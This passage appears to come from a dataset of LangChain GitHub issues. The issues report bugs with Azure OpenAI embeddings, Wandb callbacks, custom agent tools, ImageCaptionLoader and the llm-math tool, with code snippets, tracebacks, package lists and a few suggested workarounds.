- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am using the same code provided here: https://python.langchain.com/en/latest/modules/models/text_embedding/examples/azureopenai.html
My code is like:
```
import openai  # import added for completeness
from langchain.embeddings.openai import OpenAIEmbeddings

# OpenAI key and Azure settings
openai.api_type = "azure"
openai.api_version = "2023-03-15-preview"
openai.api_base = 'https://xxxxxopenai.openai.azure.com/'
openai.api_key = "xxxxxxxxxxxxxxxxxxxxxxxx"
embeddings = OpenAIEmbeddings(deployment='Embedding_Generation' )
print(embeddings.embed_query("Hi How are You"))
```
I also tried other options but get the same error on the print statement.
AuthenticationError: Access denied due to invalid subscription key or wrong API endpoint. Make sure to provide a valid key for an active subscription and use a correct regional API endpoint for your resource.
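A sketch of the pattern the official Azure example uses: set the configuration via environment variables before constructing the embeddings. The endpoint, key, and deployment name are the placeholders from above; `chunk_size=1` reflects Azure's one-input-per-request limit at the time of writing.

```python
import os

os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://xxxxxopenai.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "xxxxxxxxxxxxxxxxxxxxxxxx"
os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview"

from langchain.embeddings.openai import OpenAIEmbeddings

embeddings = OpenAIEmbeddings(deployment="Embedding_Generation", chunk_size=1)
print(embeddings.embed_query("Hi, how are you?"))
```

Setting attributes on the `openai` module, as in the snippet above, may not be picked up by `OpenAIEmbeddings`, which reads its configuration from constructor arguments and environment variables.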
### Expected behavior
I want to generate the embeddings. | langchain AzureOpenAI Embeddings | https://api.github.com/repos/langchain-ai/langchain/issues/4925/comments | 3 | 2023-05-18T12:56:40Z | 2023-05-19T20:11:46Z | https://github.com/langchain-ai/langchain/issues/4925 | 1,715,594,468 | 4,925 |
[
"hwchase17",
"langchain"
]
| ### System Info
The LLM example using the default davinci model provided in https://python.langchain.com/en/latest/ecosystem/wandb_tracking.html works fine, but the callback does not seem able to handle a ChatOpenAI object. How can this be solved?
The code is as below:
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code:
```python
from langchain.callbacks import WandbCallbackHandler, StdOutCallbackHandler
# imports added for completeness
from langchain.chat_models import ChatOpenAI
from langchain.schema import HumanMessage
wandb_callback = WandbCallbackHandler(
job_type="inference",
project="langchain_callback_demo",
group="test_group",
name="llm",
tags=["test"],
)
callbacks = [StdOutCallbackHandler(), wandb_callback]
chat = ChatOpenAI(model_name='gpt-3.5-turbo', callbacks=callbacks, temperature=0, request_timeout=20)
resp = chat([HumanMessage(content="Write me 4 greeting sentences.")])
wandb_callback.flush_tracker(chat, name="simple")
```
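As the traceback below shows, `flush_tracker` calls `.save()` on the asset, which `ChatOpenAI` does not implement at this version (the base LLM classes do). A crude workaround sketch until chat models are serializable: some logging happens before `.save()` is attempted, so tolerating the failure and closing the run by hand can keep it usable.

```python
import wandb

try:
    wandb_callback.flush_tracker(chat, name="simple")
except AttributeError:
    wandb.finish()
```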
### Expected behavior
Error:
```
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[3], line 4
2 chat = ChatOpenAI(model_name='gpt-3.5-turbo', callbacks=callbacks, temperature=0, request_timeout=20)
3 resp = chat([HumanMessage(content="Write me 4 greeting sentences.")])
----> 4 wandb_callback.flush_tracker(chat, name="simple")
File [~/miniconda3/envs/lang/lib/python3.11/site-packages/langchain/callbacks/wandb_callback.py:560](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/ocean/projects/behavior/~/miniconda3/envs/lang/lib/python3.11/site-packages/langchain/callbacks/wandb_callback.py:560), in WandbCallbackHandler.flush_tracker(self, langchain_asset, reset, finish, job_type, project, entity, tags, group, name, notes, visualize, complexity_metrics)
558 model_artifact.add(session_analysis_table, name="session_analysis")
559 try:
--> 560 langchain_asset.save(langchain_asset_path)
561 model_artifact.add_file(str(langchain_asset_path))
562 model_artifact.metadata = load_json_to_dict(langchain_asset_path)
AttributeError: 'ChatOpenAI' object has no attribute 'save'
``` | Seems Langchain Wandb can not handle the ChatOpenAI object? | https://api.github.com/repos/langchain-ai/langchain/issues/4922/comments | 6 | 2023-05-18T11:51:57Z | 2023-09-14T03:11:01Z | https://github.com/langchain-ai/langchain/issues/4922 | 1,715,504,366 | 4,922 |
[
"hwchase17",
"langchain"
]
| ### System Info
windows 11, anaconda, langchain .__version__: '0.0.171' python 3.9.16
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Hi, I am trying to build a custom tool that takes some text as input, applies a specific prompt to it, and outputs the result. The output text is correct, but I get an error at the end. Here is the code:
```python
@tool("optimistic_string")
def optimistic_string(input_string: str) -> str:
"""use when unsure about other options"""
# Add your logic to process the input_string and generate the output_string
prompt = "Rewrite the following sentence with a more optimistic tone: {{input_string}}"
output_string = llm.generate(prompt) # Replace this with the actual call to the language model
return "output_string"
tools = [optimistic_string]
# Initialize the agent with the custom tool
llm = ChatOpenAI(temperature=0)
agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True)
# Run the agent with an example input
result = agent.run( "I'm not sure about the future.")
print(result)
```
Here is the error:
```
> Entering new AgentExecutor chain...
I should try to be optimistic and see the positive possibilities.
Action: optimistic_string
Action Input: "I'm excited to see what the future holds!"Traceback (most recent call last):
…
File ~\anaconda3\envs\aagi\lib\site-packages\langchain\chat_models\openai.py:307 in <listcomp>
message_dicts = [_convert_message_to_dict(m) for m in messages]
File ~\anaconda3\envs\aagi\lib\site-packages\langchain\chat_models\openai.py:92 in _convert_message_to_dict
raise ValueError(f"Got unknown type {message}")
ValueError: Got unknown type R
```
### Expected behavior
The agent should just output the rewritten text. | ValueError: Got unknown type R | https://api.github.com/repos/langchain-ai/langchain/issues/4921/comments | 1 | 2023-05-18T11:32:44Z | 2023-05-18T14:51:39Z | https://github.com/langchain-ai/langchain/issues/4921 | 1,715,480,235 | 4,921 |
[
"hwchase17",
"langchain"
]
| ### System Info
Below is the code which I have written
```
from langchain.document_loaders import ImageCaptionLoader
import transformers
import pytesseract
pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
loader = ImageCaptionLoader(r"C:\Users\q,k and v in self-attention.PNG")
list_docs = loader.load()
list_docs
```
The above code returns the output below. It says the transformers package is not found, but it is already installed and the import runs.
```
---------------------------------------------------------------------------
ImportError Traceback (most recent call last)
File ~\anaconda3\lib\site-packages\langchain\document_loaders\image_captions.py:40, in ImageCaptionLoader.load(self)
39 try:
---> 40 from transformers import BlipForConditionalGeneration, BlipProcessor
41 except ImportError:
ImportError: cannot import name 'BlipForConditionalGeneration' from 'transformers' (C:\Users\nithi\anaconda3\lib\site-packages\transformers\__init__.py)
During handling of the above exception, another exception occurred:
ValueError Traceback (most recent call last)
Cell In[4], line 2
1 loader = ImageCaptionLoader(r"C:\Users\q,k and v in self-attention.PNG")
----> 2 list_docs = loader.load()
3 list_docs
File ~\anaconda3\lib\site-packages\langchain\document_loaders\image_captions.py:42, in ImageCaptionLoader.load(self)
40 from transformers import BlipForConditionalGeneration, BlipProcessor
41 except ImportError:
---> 42 raise ValueError(
43 "transformers package not found, please install with"
44 "`pip install transformers`"
45 )
47 processor = BlipProcessor.from_pretrained(self.blip_processor)
48 model = BlipForConditionalGeneration.from_pretrained(self.blip_model)
ValueError: transformers package not found, please install with`pip install transformers`
```
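The inner ImportError at the top of the traceback is the real signal: `BlipForConditionalGeneration` is missing from the installed `transformers`, which usually means the installed build predates the Blip classes; the "package not found" message is just how the loader wraps any ImportError. A hedged check and fix:

```python
# If this import fails, upgrade rather than (re)install:
#   pip install --upgrade transformers
from transformers import BlipForConditionalGeneration, BlipProcessor
```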
Can anyone help me with this?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
I'm unable to load the image using ImageCaptionLoader. | Unable to use ImageCaptionLoader function | https://api.github.com/repos/langchain-ai/langchain/issues/4919/comments | 4 | 2023-05-18T11:24:00Z | 2023-11-01T16:07:25Z | https://github.com/langchain-ai/langchain/issues/4919 | 1,715,469,726 | 4,919 |
[
"hwchase17",
"langchain"
]
| ### System Info
How can I enforce precise formatting for the input of a tool, such as accepting data of type list[str]? Is this achievable?
```python
# imports added for completeness; `fetcher` is assumed defined elsewhere
import re
from langchain.tools.base import tool, BaseModel, Field

class QueryTokenAssetsInput(BaseModel):
addresses: str = Field(description="like 'address1,address2,address3',should be a list of addresses")
@tool("query_token_assets", return_direct=True, args_schema=QueryTokenAssetsInput)
def query_prices(addresses: str):
"""query the prices of tokens"""
addresses = re.findall(r'"([^"]*)', addresses)[0].split(',')
addresses = [address.replace(" ",'') for address in addresses]
data = fetcher.query_tokens_price(addresses=addresses)
return data
```
Just like the code snippet provided above, when the input "addresses" is a string and the question posed to the large model is about `the price of "0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599, 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48"`, it interprets "addresses" as `'addresses = "0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599,0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84'"`. This requires me to use regular expressions to parse the string and convert it into `['0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599', '0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84']`, but sometimes "addresses" is not very consistent, leading to bugs in my regular expression parsing. How can I make the input for "addresses" more stable? Is it possible to directly convert "addresses" into a list[str]?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.tools.base import tool, BaseModel, Field
import os
from typing import List
import re

class QueryTokenAssetsInput(BaseModel):
    addresses: str = Field(description="like 'address1,address2,address3', should be a list of addresses")

@tool("query_token_assets", return_direct=True, args_schema=QueryTokenAssetsInput)
def query_prices(addresses: str):
    """query the prices of tokens"""
    addresses = re.findall(r'"([^"]*)', addresses)[0].split(',')
    addresses = [address.replace(" ", '') for address in addresses]
    data = fetcher.query_tokens_price(addresses=addresses)  # fetcher assumed defined, as above
    return data

if __name__ == "__main__":
    import json
    with open("langchain/api_key.json", "r") as f:
        api_key = json.load(f)
    os.environ["OPENAI_API_KEY"] = api_key["OPANAI_API_KEY"]
    from langchain.agents import AgentType, initialize_agent
    from langchain.chat_models import ChatOpenAI
    llm = ChatOpenAI(temperature=0)
    # second tool from the original (get_file_sizes) omitted: not defined in the snippet
    agent = initialize_agent([query_prices], llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True)
    data = agent.run("the price of 0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599, 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48")
    print(data)
```
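To get a stable `List[str]` input directly, a sketch using a typed schema with the structured chat agent (available in recent releases; assumes the same `fetcher` and `llm` as above):

```python
from typing import List
from langchain.tools.base import tool, BaseModel, Field
from langchain.agents import AgentType, initialize_agent

class QueryTokenAssetsInput(BaseModel):
    addresses: List[str] = Field(description="a list of token contract addresses")

@tool("query_token_assets", return_direct=True, args_schema=QueryTokenAssetsInput)
def query_prices(addresses: List[str]):
    """query the prices of tokens"""
    return fetcher.query_tokens_price(addresses=addresses)

agent = initialize_agent(
    [query_prices], llm,
    agent=AgentType.STRUCTURED_CHAT_ZERO_SHOT_REACT_DESCRIPTION, verbose=True,
)
```

This removes the regex parsing entirely, since the structured agent passes tool arguments as typed JSON rather than as a single string.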
### Expected behavior
How can I ensure that the input for "addresses" remains stable and directly becomes a list[str] type? | How to enable precise formatting for the input of a tools utility class, such as accepting data of type list[str]? Is this achievable? | https://api.github.com/repos/langchain-ai/langchain/issues/4918/comments | 4 | 2023-05-18T10:10:20Z | 2023-10-08T07:25:51Z | https://github.com/langchain-ai/langchain/issues/4918 | 1,715,371,728 | 4,918 |
[
"hwchase17",
"langchain"
]
| ### System Info
Working on Windows machine using a conda environment.
aiohttp==3.8.4
aiosignal==1.3.1
altair==4.2.2
anyio @ file:///C:/ci_311/anyio_1676425491996/work/dist
argilla==1.6.0
argon2-cffi @ file:///opt/conda/conda-bld/argon2-cffi_1645000214183/work
argon2-cffi-bindings @ file:///C:/ci_311/argon2-cffi-bindings_1676424443321/work
asttokens @ file:///opt/conda/conda-bld/asttokens_1646925590279/work
async-timeout==4.0.2
attrs @ file:///C:/ci_311/attrs_1676422272484/work
Babel @ file:///C:/ci_311/babel_1676427169844/work
backcall @ file:///home/ktietz/src/ci/backcall_1611930011877/work
backoff==2.2.1
beautifulsoup4 @ file:///C:/b/abs_0agyz1wsr4/croot/beautifulsoup4-split_1681493048687/work
bleach @ file:///opt/conda/conda-bld/bleach_1641577558959/work
blinker==1.6.2
brotlipy==0.7.0
cachetools==5.3.0
certifi @ file:///C:/b/abs_4a0polqwty/croot/certifi_1683875377622/work/certifi
cffi @ file:///C:/ci_311/cffi_1676423759166/work
chardet==5.1.0
charset-normalizer @ file:///tmp/build/80754af9/charset-normalizer_1630003229654/work
chromadb==0.3.21
click==8.1.3
clickhouse-connect==0.5.22
colorama @ file:///C:/ci_311/colorama_1676422310965/work
comm @ file:///C:/ci_311/comm_1678376562840/work
commonmark==0.9.1
cryptography @ file:///C:/ci_311/cryptography_1679419210767/work
Cython==0.29.34
dataclasses-json==0.5.7
debugpy @ file:///C:/ci_311/debugpy_1676426137692/work
decorator @ file:///opt/conda/conda-bld/decorator_1643638310831/work
defusedxml @ file:///tmp/build/80754af9/defusedxml_1615228127516/work
Deprecated==1.2.13
duckdb==0.7.1
entrypoints @ file:///C:/ci_311/entrypoints_1676423328987/work
et-xmlfile==1.1.0
executing @ file:///opt/conda/conda-bld/executing_1646925071911/work
fastapi==0.95.1
fastjsonschema @ file:///C:/ci_311/python-fastjsonschema_1679500568724/work
filelock==3.12.0
frozenlist==1.3.3
fsspec==2023.4.0
ftfy==6.1.1
gitdb==4.0.10
GitPython==3.1.31
google-api-core==2.11.0
google-api-python-client==2.86.0
google-auth==2.18.0
google-auth-httplib2==0.1.0
googleapis-common-protos==1.59.0
greenlet==2.0.2
h11==0.14.0
hnswlib @ file:///D:/bld/hnswlib_1675802891722/work
httpcore==0.16.3
httplib2==0.22.0
httptools==0.5.0
httpx==0.23.3
huggingface-hub==0.14.1
idna @ file:///C:/ci_311/idna_1676424932545/work
importlib-metadata==6.6.0
ipykernel @ file:///C:/ci_311/ipykernel_1678734799670/work
ipython @ file:///C:/b/abs_d1yx5tjhli/croot/ipython_1680701887259/work
ipython-genutils @ file:///tmp/build/80754af9/ipython_genutils_1606773439826/work
ipywidgets @ file:///C:/b/abs_5awapknmz_/croot/ipywidgets_1679394824767/work
jedi @ file:///C:/ci_311/jedi_1679427407646/work
Jinja2 @ file:///C:/ci_311/jinja2_1676424968965/work
joblib==1.2.0
json5 @ file:///tmp/build/80754af9/json5_1624432770122/work
jsonschema @ file:///C:/b/abs_d40z05b6r1/croot/jsonschema_1678983446576/work
jupyter @ file:///C:/ci_311/jupyter_1678249952587/work
jupyter-console @ file:///C:/b/abs_82xaa6i2y4/croot/jupyter_console_1680000189372/work
jupyter-server @ file:///C:/ci_311/jupyter_server_1678228762759/work
jupyter_client @ file:///C:/b/abs_059idvdagk/croot/jupyter_client_1680171872444/work
jupyter_core @ file:///C:/b/abs_9d0ttho3bs/croot/jupyter_core_1679906581955/work
jupyterlab @ file:///C:/ci_311/jupyterlab_1677719392688/work
jupyterlab-pygments @ file:///tmp/build/80754af9/jupyterlab_pygments_1601490720602/work
jupyterlab-widgets @ file:///C:/b/abs_38ad427jkz/croot/jupyterlab_widgets_1679055289211/work
jupyterlab_server @ file:///C:/b/abs_e0qqsihjvl/croot/jupyterlab_server_1680792526136/work
langchain==0.0.157
lxml @ file:///C:/b/abs_c2bg6ck92l/croot/lxml_1679646459966/work
lz4==4.3.2
Markdown==3.4.3
MarkupSafe @ file:///C:/ci_311/markupsafe_1676424152318/work
marshmallow==3.19.0
marshmallow-enum==1.5.1
matplotlib-inline @ file:///C:/ci_311/matplotlib-inline_1676425798036/work
mistune @ file:///C:/ci_311/mistune_1676425149302/work
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
mypy-extensions==1.0.0
nbclassic @ file:///C:/b/abs_c8_rs7b3zw/croot/nbclassic_1681756186106/work
nbclient @ file:///C:/ci_311/nbclient_1676425195918/work
nbconvert @ file:///C:/ci_311/nbconvert_1676425836196/work
nbformat @ file:///C:/ci_311/nbformat_1676424215945/work
nest-asyncio @ file:///C:/ci_311/nest-asyncio_1676423519896/work
networkx==3.1
nltk==3.8.1
notebook @ file:///C:/b/abs_49d8mc_lpe/croot/notebook_1681756182078/work
notebook_shim @ file:///C:/ci_311/notebook-shim_1678144850856/work
numexpr==2.8.4
numpy==1.23.5
olefile==0.46
openai==0.27.6
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
packaging @ file:///C:/b/abs_ed_kb9w6g4/croot/packaging_1678965418855/work
pandas==1.5.3
pandocfilters @ file:///opt/conda/conda-bld/pandocfilters_1643405455980/work
parso @ file:///opt/conda/conda-bld/parso_1641458642106/work
pdfminer.six==20221105
pickleshare @ file:///tmp/build/80754af9/pickleshare_1606932040724/work
Pillow==9.5.0
platformdirs @ file:///C:/ci_311/platformdirs_1676422658103/work
ply==3.11
posthog==3.0.1
prometheus-client @ file:///C:/ci_311/prometheus_client_1679591942558/work
prompt-toolkit @ file:///C:/ci_311/prompt-toolkit_1676425940920/work
protobuf==3.20.3
psutil @ file:///C:/ci_311_rebuilds/psutil_1679005906571/work
pure-eval @ file:///opt/conda/conda-bld/pure_eval_1646925070566/work
pyarrow==11.0.0
pyasn1==0.5.0
pyasn1-modules==0.3.0
pycparser @ file:///tmp/build/80754af9/pycparser_1636541352034/work
pydantic==1.10.7
pydeck==0.8.1b0
Pygments @ file:///opt/conda/conda-bld/pygments_1644249106324/work
Pympler==1.0.1
pyOpenSSL @ file:///C:/b/abs_de215ipd18/croot/pyopenssl_1678965319166/work
pypandoc==1.11
pyparsing==3.0.9
PyQt5==5.15.7
PyQt5-sip @ file:///C:/ci_311/pyqt-split_1676428895938/work/pyqt_sip
pyrsistent @ file:///C:/ci_311/pyrsistent_1676422695500/work
PySocks @ file:///C:/ci_311/pysocks_1676425991111/work
python-dateutil @ file:///tmp/build/80754af9/python-dateutil_1626374649649/work
python-docx==0.8.11
python-dotenv==1.0.0
python-magic==0.4.27
python-pptx==0.6.21
pytz @ file:///C:/ci_311/pytz_1676427070848/work
pytz-deprecation-shim==0.1.0.post0
pywin32==305.1
pywinpty @ file:///C:/ci_311/pywinpty_1677707791185/work/target/wheels/pywinpty-2.0.10-cp311-none-win_amd64.whl
PyYAML==6.0
pyzmq @ file:///C:/b/abs_8b16zbmf46/croot/pyzmq_1682697651374/work
qtconsole @ file:///C:/b/abs_eb4u9jg07y/croot/qtconsole_1681402843494/work
QtPy @ file:///C:/ci_311/qtpy_1676432558504/work
regex==2023.3.23
requests @ file:///C:/b/abs_41owkd5ymz/croot/requests_1682607524657/work
rfc3986==1.5.0
rich==13.0.1
rsa==4.9
scikit-learn==1.2.2
scipy==1.10.1
Send2Trash @ file:///tmp/build/80754af9/send2trash_1632406701022/work
sentence-transformers==2.2.2
sentencepiece==0.1.99
sip @ file:///C:/ci_311/sip_1676427825172/work
six @ file:///tmp/build/80754af9/six_1644875935023/work
smmap==5.0.0
sniffio @ file:///C:/ci_311/sniffio_1676425339093/work
soupsieve @ file:///C:/b/abs_a989exj3q6/croot/soupsieve_1680518492466/work
SQLAlchemy==2.0.12
stack-data @ file:///opt/conda/conda-bld/stack_data_1646927590127/work
starlette==0.26.1
streamlit==1.22.0
sympy==1.11.1
tenacity==8.2.2
terminado @ file:///C:/ci_311/terminado_1678228513830/work
threadpoolctl==3.1.0
tiktoken==0.3.3
tinycss2 @ file:///C:/ci_311/tinycss2_1676425376744/work
tokenizers==0.13.3
toml @ file:///tmp/build/80754af9/toml_1616166611790/work
tomli @ file:///C:/ci_311/tomli_1676422027483/work
toolz==0.12.0
torch==2.0.0
torchvision==0.15.1
tornado @ file:///C:/ci_311/tornado_1676423689414/work
tqdm==4.65.0
traitlets @ file:///C:/ci_311/traitlets_1676423290727/work
transformers==4.28.1
typing-inspect==0.8.0
typing_extensions @ file:///C:/b/abs_a1bb332wcs/croot/typing_extensions_1681939523095/work
tzdata==2023.3
tzlocal==4.3
unstructured==0.6.2
uritemplate==4.1.1
urllib3 @ file:///C:/b/abs_3ce53vrdcr/croot/urllib3_1680254693505/work
uvicorn==0.22.0
validators==0.20.0
watchdog==3.0.0
watchfiles==0.19.0
wcwidth @ file:///Users/ktietz/demo/mc3/conda-bld/wcwidth_1629357192024/work
webencodings==0.5.1
websocket-client @ file:///C:/ci_311/websocket-client_1676426063281/work
websockets==11.0.2
widgetsnbextension @ file:///C:/b/abs_882k4_4kdf/croot/widgetsnbextension_1679313880295/work
wikipedia==1.4.0
win-inet-pton @ file:///C:/ci_311/win_inet_pton_1676425458225/work
wrapt==1.14.1
XlsxWriter==3.1.0
yarl==1.9.2
zipp==3.15.0
zstandard==0.21.0
### Who can help?
@vowelparrot
Hi, I'm facing an issue with the llm-math tool. I am using a Tool created from my documents together with the built-in llm-math tool. For some queries, the llm-math tool receives a word problem rather than a mathematical expression. How can I avoid this problem?
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
# imports added for completeness; `embedding` is assumed defined (e.g. OpenAIEmbeddings())
from langchain.llms import OpenAI
from langchain.vectorstores import Chroma
from langchain.chains import RetrievalQA
from langchain.agents import AgentType, Tool, initialize_agent, load_tools

llm = OpenAI(model_name="gpt-3.5-turbo", temperature=0)  # text-davinci-003
db = Chroma(persist_directory="db_publications", embedding_function=embedding)
chain = RetrievalQA.from_chain_type(llm=llm, chain_type="stuff", retriever=db.as_retriever(search_kwargs={"k": 2}))
#custom tool is created using my documents
custom_tool = [
Tool(
name="Tax_Tool",
func=chain.run,
description="Use this tool to answer tax related queries") ]
# built-in tools are loaded
tools = load_tools(["llm-math"], llm=llm)
# built-in tools are appended to the custom tool to maintain priority
for tool in tools:
custom_tool.append(tool)
# Finally, let's initialize an agent with the tools, the language model, and the type of agent we want to use.
agent = initialize_agent(
custom_tool, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True)
# Now let's test it out!
result = agent(
{"input" : "I am married and filing jointly. How much additional Medicare Tax I have to pay if my net earnings are $300,000?"}
)
```
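One mitigation sketch: tighten the Calculator tool's description so the agent hands it a bare expression instead of a word problem (the transcript below shows the tool is registered as "Calculator"; the description text here is mine, not the library's):

```python
math_tool = load_tools(["llm-math"], llm=llm)[0]
math_tool.description = (
    "Useful for arithmetic. Input MUST be a plain numerical expression, "
    "e.g. '(300000 - 250000) * 0.009', never a sentence or word problem."
)
```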
### Expected behavior
```
> Entering new AgentExecutor chain...
I need to use a tax calculator to determine the additional Medicare Tax.
Action: Calculator
Action Input: Input $300,000 and select the option for married filing jointly.
2023-05-18 14:15:59.978 Uncaught app exception
Traceback (most recent call last):
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 80, in _evaluate_expression
numexpr.evaluate(
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\numexpr\necompiler.py", line 817, in evaluate
_names_cache[expr_key] = getExprNames(ex, context)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\numexpr\necompiler.py", line 704, in getExprNames
ex = stringToExpression(text, {}, context)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\numexpr\necompiler.py", line 274, in stringToExpression
c = compile(s, '<expr>', 'eval', flags)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<expr>", line 1
None (this is not a math problem)
^^^^^^^^^^^^^^^^^^
SyntaxError: invalid syntax. Perhaps you forgot a comma?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 565, in _run_script
exec(code, module.__dict__)
File "D:\Projects\TaxAdvisor\TaxAdviorWithNewDb\agent_gpt_without_observations.py", line 159, in <module>
result = agent(
^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 140, in __call__
raise e
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 134, in __call__
self._call(inputs, run_manager=run_manager)
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\agents\agent.py", line 922, in _call
next_step_output = self._take_next_step(
^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\agents\agent.py", line 800, in _take_next_step
observation = tool.run(
^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\tools\base.py", line 255, in run
raise e
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\tools\base.py", line 249, in run
self._run(*tool_args, run_manager=run_manager, **tool_kwargs)
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\tools\base.py", line 344, in _run
self.func(
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 236, in run
return self(args[0], callbacks=callbacks)[self.output_keys[0]]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 140, in __call__
raise e
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\base.py", line 134, in __call__
self._call(inputs, run_manager=run_manager)
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 149, in _call
return self._process_llm_result(llm_output, _run_manager)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 103, in _process_llm_result
output = self._evaluate_expression(expression)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\hizafa.nadeem\AppData\Local\anaconda3\envs\tax_app\Lib\site-packages\langchain\chains\llm_math\base.py", line 87, in _evaluate_expression
raise ValueError(
ValueError: LLMMathChain._evaluate("
None (this is not a math problem)
") raised error: invalid syntax. Perhaps you forgot a comma? (<expr>, line 1). Please try again with a valid numerical expression
| llm-math Tools takes a word problem rather than a numerical expression. | https://api.github.com/repos/langchain-ai/langchain/issues/4917/comments | 3 | 2023-05-18T09:20:29Z | 2023-12-11T20:49:37Z | https://github.com/langchain-ai/langchain/issues/4917 | 1,715,302,612 | 4,917 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I use two agents with the same LLM. Why is the Observation of one agent the actual output of the tool, while the other's is not? **How do I make the Observation be the tool's actual return value?**
```python
class CustomAgentExecutor(object):
def __init__(self, template: str, tools: List[BaseTool], llm):
self.template = template
self.tools = tools
self.llm = llm
self.agent_executor = self._initialize_executor()
def _initialize_executor(self):
